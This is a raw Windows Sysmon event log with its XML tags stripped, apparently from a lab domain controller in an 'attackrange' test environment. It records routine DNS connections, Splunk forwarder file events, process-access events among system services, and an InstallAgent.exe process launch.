AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local63704- 354300x800000000000000010246Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.422{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local56487- 23542300x800000000000000010245Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:11.856{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8A55D9F8D04E3EBF439A4F4A4ABE978,SHA256=AAC8FB38C36D0639C672058603E92E2744CA76DCADF30384B203CB42468C6533,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010244Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.420{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT 
AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local54575- 354300x800000000000000010243Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.417{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local58735- 354300x800000000000000010242Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.417{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local60177- 354300x800000000000000010241Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.416{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local58343- 354300x800000000000000010240Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.415{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local61223- 354300x800000000000000010239Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.414{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local64732- 354300x800000000000000010238Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.413{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT 
AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local58583- 354300x800000000000000010237Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.412{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local57177- 354300x800000000000000010236Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.412{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local61861- 354300x800000000000000010235Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.410{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local54281- 354300x800000000000000010234Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.410{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local62062- 354300x800000000000000010233Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.409{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local61750- 354300x800000000000000010232Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.408{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT 
AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local62421- 354300x800000000000000010231Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.407{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local64251- 354300x800000000000000010230Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.405{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local59684- 354300x800000000000000010229Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.404{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local59468- 354300x800000000000000010228Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.401{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local54588- 354300x800000000000000010227Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.400{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local61139- 354300x800000000000000010226Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.399{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT 
AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local63670- 354300x800000000000000010225Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.399{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local61143- 354300x800000000000000010224Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.398{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local58749- 354300x800000000000000010223Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.397{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local60190- 354300x800000000000000010222Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.395{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local63386- 354300x800000000000000010221Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.394{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local58345- 354300x800000000000000010220Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.393{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT 
AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local63723- 354300x800000000000000010219Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.392{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local55281- 354300x800000000000000010218Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.391{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local54956- 354300x800000000000000010217Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.384{266CAFBE-646C-6064-0D00-00000000AE01}612C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53679-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local135epmap 354300x800000000000000010216Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.384{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53679-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local135epmap 23542300x800000000000000010274Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:12.996{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D46A372A73AD08D4090AFDDF43118C3,SHA256=D401E2B2F62E24B8B86372BA9623AE7808A6D95799493926355F4B698F0FFBC8,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x800000000000000010273Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:12.871{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-6467-6064-0100-00000000AE01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000010272Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:07:12.668{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010271Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:12.668{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010270Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:07:12.668{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010269Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:12.668{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010268Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:07:12.668{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-65F0-6064-5F01-00000000AE01}6192C:\Windows\System32\InstallAgent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010267Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:12.652{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-65F0-6064-5F01-00000000AE01}6192C:\Windows\System32\InstallAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010266Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:07:12.652{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010265Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:12.652{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010264Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:07:12.652{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010263Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:12.652{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010262Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:07:12.652{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-65F0-6064-5F01-00000000AE01}6192C:\Windows\System32\InstallAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010261Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:12.652{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-65F0-6064-5F01-00000000AE01}6192C:\Windows\System32\InstallAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35af2|c:\windows\system32\rpcss.dll+3c90d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000010260Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:12.660{266CAFBE-65F0-6064-5F01-00000000AE01}6192C:\Windows\System32\InstallAgent.exe10.0.14393.4169 (rs1_release.210107-1130)InstallAgentMicrosoft® Windows® Operating SystemMicrosoft CorporationInstallAgent.exeC:\Windows\System32\InstallAgent.exe 
-EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=88C7DCDD735B31E4F5620E4B9F38C87F,SHA256=5EF1322B96F176C4EA4B8304CAF8B45E2E42C3188AA82ED1FD6196AFC04B7297,IMPHASH=EAB6EF3DE625719627DC808B5F0501FC{266CAFBE-646C-6064-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x800000000000000010259Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:12.621{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010258Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
